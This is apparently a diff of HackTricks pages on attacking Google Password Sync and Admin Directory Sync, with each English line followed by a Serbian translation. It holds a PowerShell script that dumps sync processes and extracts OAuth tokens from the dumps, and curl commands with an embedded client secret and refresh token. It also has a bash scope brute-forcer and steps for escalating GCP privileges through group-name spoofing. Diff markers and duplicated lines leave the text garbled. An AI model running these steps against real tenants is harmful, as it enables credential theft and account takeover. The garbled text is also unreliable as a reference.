In case the Password Sync was **configured with SA credentials**, it will also be stored in keys inside the registry **`HKLM\Software\Google\Google Apps Password Sync`**.
U slučaju da je Password Sync **konfiguran sa SA akreditivima**, takođe će biti sačuvani u ključevima unutar registra **`HKLM\Software\Google\Google Apps Password Sync`**.
### GPS - Dumping tokens from memory
### GPS - Ispisivanje tokena iz memorije
Just like with GCPW, it's possible to dump the memory of the process of the `PasswordSync.exe` and the `password_sync_service.exe` processes and you will be able to find refresh and access tokens (if they have been generated already).\
I guess you could also find the AD configured credentials.
Baš kao i sa GCPW, moguće je ispisati memoriju procesa `PasswordSync.exe` i `password_sync_service.exe` i moći ćete da pronađete refresh i access tokene (ako su već generisani).\
Pretpostavljam da biste takođe mogli pronaći konfigurirane akreditive za AD.
<details>
<summary>Dump <code>PasswordSync.exe</code> and the <code>password_sync_service.exe</code> processes and search tokens</summary>
<summary>Ispisivanje <code>PasswordSync.exe</code> i <code>password_sync_service.exe</code> procesa i pretraga tokena</summary>
```powershell
# Define paths for Procdump and Strings utilities
$procdumpPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\procdump.exe"
@@ -61,8 +60,8 @@ $dumpFolder = "C:\Users\Public\dumps"
# Regular expressions for tokens
$tokenRegexes = @(
"ya29\.[a-zA-Z0-9_\.\-]{50,}",
"1//[a-zA-Z0-9_\.\-]{50,}"
"ya29\.[a-zA-Z0-9_\.\-]{50,}",
"1//[a-zA-Z0-9_\.\-]{50,}"
)
# Show EULA if it wasn't accepted yet for strings
@@ -70,7 +69,7 @@ $stringsPath
# Create a directory for the dumps if it doesn't exist
if (!(Test-Path $dumpFolder)) {
New-Item -Path $dumpFolder -ItemType Directory
New-Item -Path $dumpFolder -ItemType Directory
}
# Get all Chrome process IDs
@@ -79,94 +78,90 @@ $chromeProcesses = Get-Process | Where-Object { $processNames -contains $_.Name
# Dump each Chrome process
foreach ($processId in $chromeProcesses) {
Write-Output "Dumping process with PID: $processId"
& $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"
Write-Output "Dumping process with PID: $processId"
& $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"
}
# Extract strings and search for tokens in each dump
Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {
$dumpFile = $_.FullName
$baseName = $_.BaseName
$asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"
$unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"
$dumpFile = $_.FullName
$baseName = $_.BaseName
$asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"
$unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"
Write-Output "Extracting strings from $dumpFile"
& $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile
& $stringsPath -n 50 -nobanner -u $dumpFile > $unicodeStringsFile
Write-Output "Extracting strings from $dumpFile"
& $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile
& $stringsPath -n 50 -nobanner -u $dumpFile > $unicodeStringsFile
$outputFiles = @($asciiStringsFile, $unicodeStringsFile)
$outputFiles = @($asciiStringsFile, $unicodeStringsFile)
foreach ($file in $outputFiles) {
foreach ($regex in $tokenRegexes) {
foreach ($file in $outputFiles) {
foreach ($regex in $tokenRegexes) {
$matches = Select-String -Path $file -Pattern $regex -AllMatches
$matches = Select-String -Path $file -Pattern $regex -AllMatches
$uniqueMatches = @{}
$uniqueMatches = @{}
foreach ($matchInfo in $matches) {
foreach ($match in $matchInfo.Matches) {
$matchValue = $match.Value
if (-not $uniqueMatches.ContainsKey($matchValue)) {
$uniqueMatches[$matchValue] = @{
LineNumber = $matchInfo.LineNumber
LineText = $matchInfo.Line.Trim()
FilePath = $matchInfo.Path
}
}
}
}
foreach ($matchInfo in $matches) {
foreach ($match in $matchInfo.Matches) {
$matchValue = $match.Value
if (-not $uniqueMatches.ContainsKey($matchValue)) {
$uniqueMatches[$matchValue] = @{
LineNumber = $matchInfo.LineNumber
LineText = $matchInfo.Line.Trim()
FilePath = $matchInfo.Path
}
}
}
}
foreach ($matchValue in $uniqueMatches.Keys) {
$info = $uniqueMatches[$matchValue]
Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)"
}
}
foreach ($matchValue in $uniqueMatches.Keys) {
$info = $uniqueMatches[$matchValue]
Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)"
}
}
Write-Output ""
}
Write-Output ""
}
}
```
</details>
### GPS - Generating access tokens from refresh tokens
Using the refresh token it's possible to generate access tokens using it and the client ID and client secret specified in the following command:
### GPS - Generisanje pristupnih tokena iz osvežavajućih tokena
Korišćenjem osvežavajućeg tokena moguće je generisati pristupne tokene koristeći ga i ID klijenta i tajnu klijenta navedene u sledećoj komandi:
```bash
curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.googleusercontent.com" \
--data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03pJpHDWuak63CgYIARAAGAMSNwF-L9IrfLo73ERp20Un2c9KlYDznWhKJOuyXOzHM6oJaO9mqkBx79LjKOdskVrRDGgvzSCJY78" \
https://www.googleapis.com/oauth2/v4/token
--data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03pJpHDWuak63CgYIARAAGAMSNwF-L9IrfLo73ERp20Un2c9KlYDznWhKJOuyXOzHM6oJaO9mqkBx79LjKOdskVrRDGgvzSCJY78" \
https://www.googleapis.com/oauth2/v4/token
```
### GPS - Scopes
> [!NOTE]
> Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**.
> Imajte na umu da čak i sa refresh token-om, nije moguće zatražiti bilo koji scope za access token jer možete zatražiti samo **scope-ove koje podržava aplikacija u kojoj generišete access token**.
>
> Also, the refresh token is not valid in every application.
> Takođe, refresh token nije važeći u svakoj aplikaciji.
By default GPS won't have access as the user to every possible OAuth scope, so using the following script we can find the scopes that can be used with the `refresh_token` to generate an `access_token`:
Podrazumevano, GPS neće imati pristup kao korisnik svim mogućim OAuth scope-ovima, pa korišćenjem sledećeg skripta možemo pronaći scope-ove koji se mogu koristiti sa `refresh_token` za generisanje `access_token`:
<details>
<summary>Bash script to brute-force scopes</summary>
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope \r"
if ! curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.googleusercontent.com" \
--data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03pJpHDWuak63CgYIARAAGAMSNwF-L9IrfLo73ERp20Un2c9KlYDznWhKJOuyXOzHM6oJaO9mqkBx79LjKOdskVrRDGgvzSCJY78" \
--data "scope=$scope" \
https://www.googleapis.com/oauth2/v4/token 2>&1 | grep -q "error_description"; then
echo ""
echo $scope
echo $scope >> /tmp/valid_scopes.txt
fi
echo -ne "Testing $scope \r"
if ! curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.googleusercontent.com" \
--data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03pJpHDWuak63CgYIARAAGAMSNwF-L9IrfLo73ERp20Un2c9KlYDznWhKJOuyXOzHM6oJaO9mqkBx79LjKOdskVrRDGgvzSCJY78" \
--data "scope=$scope" \
https://www.googleapis.com/oauth2/v4/token 2>&1 | grep -q "error_description"; then
echo ""
echo $scope
echo $scope >> /tmp/valid_scopes.txt
fi
done
echo ""
@@ -175,22 +170,15 @@ echo "Valid scopes:"
cat /tmp/valid_scopes.txt
rm /tmp/valid_scopes.txt
```
</details>
And this is the output I got at the time of the writing:
I ovo je izlaz koji sam dobio u vreme pisanja:
```
https://www.googleapis.com/auth/admin.directory.user
```
Which is the same one you get if you don't indicate any scope.
Koji je isti kao onaj koji dobijate ako ne navedete nikakav opseg.
> [!CAUTION]
> With this scope you could **modify the password of a existing user to escalate privileges**.
> Sa ovim opsegom možete **modifikovati lozinku postojećeg korisnika kako biste eskalirali privilegije**.
{{#include ../../../banners/hacktricks-training.md}}
@@ -2,60 +2,56 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Osnovne informacije
The main difference between this way to synchronize users with GCDS is that GCDS is done manually with some binaries you need to download and run while **Admin Directory Sync is serverless** managed by Google in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
Glavna razlika između ovog načina sinhronizacije korisnika sa GCDS je ta što se GCDS radi ručno sa nekim binarnim datotekama koje treba preuzeti i pokrenuti, dok je **Admin Directory Sync bezserverski** i upravlja njime Google na [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
At the moment of this writing this service is in beta and it supports 2 types of synchronization: From **Active Directory** and from **Azure Entra ID:**
U trenutku pisanja ovog teksta, ova usluga je u beta verziji i podržava 2 tipa sinhronizacije: Iz **Active Directory** i iz **Azure Entra ID:**
- **Active Directory:** In order to set this up you need to give **access to Google to you Active Directory environment**. And as Google only has access to GCP networks (via **VPC connectors**) you need to create a connector and then make your AD available from that connector by having it in VMs in the GCP network or using Cloud VPN or Cloud Interconnect. Then, you also need to provide **credentials** of an account with read access over the directory and **certificate** to contact via **LDAPS**.
- **Azure Entra ID:** To configure this it's just needed to **login in Azure with a user with read access** over the Entra ID subscription in a pop-up showed by Google, and Google will keep the token with read access over Entra ID.
- **Active Directory:** Da biste ovo postavili, potrebno je da **dajte pristup Google-u vašem Active Directory okruženju**. Kako Google ima pristup samo GCP mrežama (putem **VPC konektora**), potrebno je da kreirate konektor i zatim učinite svoj AD dostupnim iz tog konektora tako što ćete ga imati u VM-ovima u GCP mreži ili koristeći Cloud VPN ili Cloud Interconnect. Takođe, potrebno je da obezbedite **akreditiv** naloga sa pristupom za čitanje nad direktorijumom i **sertifikat** za kontakt putem **LDAPS**.
- **Azure Entra ID:** Da biste ovo konfigurisali, potrebno je samo da **prijavite se u Azure sa korisnikom koji ima pristup za čitanje** nad Entra ID pretplatom u iskačućem prozoru koji prikazuje Google, a Google će zadržati token sa pristupom za čitanje nad Entra ID.
Once correctly configured, both options will allow to **synchronize users and groups to Workspace**, but it won't allow to configure users and groups from Workspace to AD or EntraID.
Kada je pravilno konfigurisano, obe opcije će omogućiti **sinhronizaciju korisnika i grupa sa Workspace**, ali neće omogućiti konfiguraciju korisnika i grupa iz Workspace u AD ili EntraID.
Other options that it will allow during this synchronization are:
Druge opcije koje će biti omogućene tokom ove sinhronizacije su:
- Send an email to the new users to log-in
- Automatically change their email address to the one used by Workspace. So if Workspace is using `@hacktricks.xyz` and EntraID users use `@carloshacktricks.onmicrosoft.com`, `@hacktricks.xyz` will be used for the users created in the account.
- Select the **groups containing the users** that will be synced.
- Select to **groups** to synchronize and create in Workspace (or indicate to synchronize all groups).
- Slanje emaila novim korisnicima za prijavu
- Automatska promena njihove email adrese na onu koju koristi Workspace. Dakle, ako Workspace koristi `@hacktricks.xyz` a EntraID korisnici koriste `@carloshacktricks.onmicrosoft.com`, `@hacktricks.xyz` će biti korišćena za korisnike kreirane u nalogu.
- Odabir **grupa koje sadrže korisnike** koji će biti sinhronizovani.
- Odabir **grupa** za sinhronizaciju i kreiranje u Workspace (ili označavanje za sinhronizaciju svih grupa).
### From AD/EntraID -> Google Workspace (& GCP)
### Iz AD/EntraID -> Google Workspace (& GCP)
If you manage to compromise an AD or EntraID you will have total control of the users & groups that are going to be synchronized with Google Workspace.\
However, notice that the **passwords** the users might be using in Workspace **could be the same ones or not**.
Ako uspete da kompromitujete AD ili EntraID, imaćete potpunu kontrolu nad korisnicima i grupama koje će biti sinhronizovane sa Google Workspace.\
Međutim, imajte na umu da **lozinke** koje korisnici možda koriste u Workspace **mogu biti iste ili ne**.
#### Attacking users
#### Napad na korisnike
When the synchronization happens it might synchronize **all the users from AD or only the ones from a specific OU** or only the **users members of specific groups in EntraID**. This means that to attack a synchronized user (or create a new one that gets synchronized) you will need first to figure out which users are being synchronized.
Kada se sinhronizacija dogodi, može sinhronizovati **sve korisnike iz AD ili samo one iz specifične OU** ili samo **korisnike članove specifičnih grupa u EntraID**. To znači da da biste napali sinhronizovanog korisnika (ili kreirali novog koji se sinhronizuje), prvo ćete morati da saznate koji se korisnici sinhronizuju.
- Users might be **reusing the password or not from AD or EntraID**, but this mean that you will need to **compromise the passwords of the users to login**.
- If you have access to the **mails** of the users, you could **change the Workspace password of an existing user**, or **create a new user**, wait until it gets synchronized an setup the account.
- Korisnici mogu **ponovo koristiti lozinku ili ne iz AD ili EntraID**, ali to znači da ćete morati da **kompromitujete lozinke korisnika da biste se prijavili**.
- Ako imate pristup **mailovima** korisnika, mogli biste **promeniti Workspace lozinku postojećeg korisnika**, ili **kreirati novog korisnika**, sačekati da se sinhronizuje i postaviti nalog.
Once you access the user inside Workspace it might be given some **permissions by default**.
Kada pristupite korisniku unutar Workspace, može mu biti dodeljeno nekoliko **dozvola po defaultu**.
#### Attacking Groups
#### Napad na grupe
You also need to figure out first which groups are being synchronized. Although there is the possibility that **ALL** the groups are being synchronized (as Workspace allows this).
Takođe treba prvo da saznate koje se grupe sinhronizuju. Iako postoji mogućnost da se **SVE** grupe sinhronizuju (jer Workspace to omogućava).
> [!NOTE]
> Note that even if the groups and memberships are imported into Workspace, the **users that aren't synchronized in the users sychronization won't be created** during groups synchronization even if they are members of any of the groups synchronized.
> Imajte na umu da čak i ako su grupe i članstva uvezena u Workspace, **korisnici koji nisu sinhronizovani u sinhronizaciji korisnika neće biti kreirani** tokom sinhronizacije grupa čak i ako su članovi bilo koje od sinhronizovanih grupa.
If you know which groups from Azure are being **assigned permissions in Workspace or GCP**, you could just add a compromised user (or newly created) in that group and get those permissions.
Ako znate koje grupe iz Azure su **dodeljene dozvole u Workspace ili GCP**, mogli biste jednostavno dodati kompromitovanog korisnika (ili novokreiranog) u tu grupu i dobiti te dozvole.
There is another option to abuse existing privileged groups in Workspace. For example, the group `gcp-organization-admins@<workspace.email>` usually has high privileges over GCP.
Postoji još jedna opcija za zloupotrebu postojećih privilegovanih grupa u Workspace. Na primer, grupa `gcp-organization-admins@<workspace.email>` obično ima visoke privilegije nad GCP.
If the synchronization from, for example EntraID, to Workspace is **configured to replace the domain** of the imported object **with the email of Workspace**, it will be possible for an attacker to create the group `gcp-organization-admins@<entraid.email>` in EntraID, add a user in this group, and wait until the synchronization of all the groups happen.\
**The user will be added in the group `gcp-organization-admins@<workspace.email>` escalating privileges in GCP.**
Ako je sinhronizacija iz, na primer, EntraID, u Workspace **konfigurisana da zameni domen** uvezenog objekta **sa email-om Workspace**, biće moguće za napadača da kreira grupu `gcp-organization-admins@<entraid.email>` u EntraID, doda korisnika u ovu grupu i sačeka da se sinhronizacija svih grupa dogodi.\
**Korisnik će biti dodat u grupu `gcp-organization-admins@<workspace.email>` eskalirajući privilegije u GCP.**
### From Google Workspace -> AD/EntraID
### Iz Google Workspace -> AD/EntraID
Note that Workspace require credentials with read only access over AD or EntraID to synchronize users and groups. Therefore, it's not possible to abuse Google Workspace to perform any change in AD or EntraID. So **this isn't possible** at this moment.
Imajte na umu da Workspace zahteva akreditive sa pristupom samo za čitanje nad AD ili EntraID da bi sinhronizovao korisnike i grupe. Stoga, nije moguće zloupotrebiti Google Workspace da bi se izvršila bilo kakva promena u AD ili EntraID. Dakle, **to nije moguće** u ovom trenutku.
I also don't know where does Google store the AD credentials or EntraID token and you **can't recover them re-configuring the synchronizarion** (they don't appear in the web form, you need to give them again). However, from the web it might be possible to abuse the current functionality to **list users and groups**.
Takođe ne znam gde Google čuva AD akreditive ili EntraID token i ne **možete ih povratiti ponovnom konfiguracijom sinhronizacije** (ne pojavljuju se u web formi, morate ih ponovo uneti). Međutim, putem web-a može biti moguće zloupotrebiti trenutnu funkcionalnost da **prikazujete korisnike i grupe**.
{{#include ../../../banners/hacktricks-training.md}}